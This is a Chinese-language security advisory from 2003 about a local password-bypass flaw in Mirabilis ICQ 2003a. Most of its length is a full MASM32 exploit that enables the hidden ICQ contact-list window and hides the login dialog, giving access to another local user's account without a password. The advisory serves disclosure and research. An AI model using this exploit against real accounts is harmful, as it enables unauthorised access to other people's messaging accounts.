安全研究
安全漏洞
Mirabilis ICQ口令认证绕过漏洞
发布日期:2003-07-05
更新日期:2003-07-14
受影响系统:
Mirabilis ICQ 2003 a Build 3800描述:
Mirabilis ICQ 2003 a Build 3799
Mirabilis ICQ 2003 a Build 3777
BUGTRAQ ID: 8111
Mirabilis ICQ是一款流行的即时通信软件。
Mirabilis ICQ存在设计问题,本地攻击者可以利用部分API,访问使用其他用户ICQ。
使用EnableWindow API函数激活ICQ联系列表(Contact List)窗口,在窗口激活后就可以设置ICQ状态为在线,无需任何密码检查访问使用其他用户的帐户。
<*来源:"Caua" Moura Prado (mouraprado@infoguerra.com.br)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105760672128834&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
; ?????????????????????????????????????????????????????
????????????????????
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT
HERE - CUT HERE BOF
; -----------------------------------------------------
--------------------
;
; 07/02/2003 - ca1-icq.asm
; ICQ Password Bypass exploit.
; written by Cau? Moura Prado (aka ca1)
; mouraprado@infoguerra.com.br - ICQ 373313
;
; This exploit allows you to login to ICQ server
using any account registered *locally*
; no matter the 'save password' option is checked or
not. High level security is also bypassed.
; All you have to do is run the exploit and set
status property using your mouse when the flower
; is yellow. If you accidentally set status to
offline then you will need to restart ICQ and run
; the exploit again. Greets to: Alex Demchenko(aka
Coban), my cousin Rhenan for testing the exploit
; on his machine and that tiny Israeli company for
starting the whole thing. Oh sure.. hehehe
; I can't forget... many kisses to those 3 chicks
from my building for being so hot!! ;)
;
;
; uh-oh!
; ___
; __/ \__
; / \___/ \ Vulnerable:
; \__/+ +\__/ ICQ Pro 2003a Build #3800
; / ~~~ ; \__/ \__/ Not Vulnerable:
; \___/ ICQ Lite alpha Build 1211
; ICQ 2001b and ICQ 2002a
; tHe Flaw Power All other versions were not
tested.
;
coded with masm32
;
_______________________________________________________
________________________exploit born in .br
.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
invoke FindWindow, addr szClassName, addr szTextHigh
mov hWndLogin, eax
.if hWndLogin == 0
invoke FindWindow, addr szClassName, addr szTextLow
mov hWndLogin, eax
.endif
invoke GetParent, hWndLogin
invoke EnableWindow, eax, 1 ;Enable ICQ contact
list
invoke ShowWindow, hWndLogin, 0 ;get rid of Login
screen (don't kill this window)
invoke ExitProcess, 0 ;uhuu.. cya! i gotta
sleep!
end _entrypoint
; ?????????????????????????????????????????????????????
????????????????????
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT
HERE - CUT HERE EOF
; -----------------------------------------------------
--------------------
建议:
厂商补丁:
Mirabilis
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.icq.com
浏览次数:3151
严重程度:0(网友投票)
绿盟科技给您安全的保障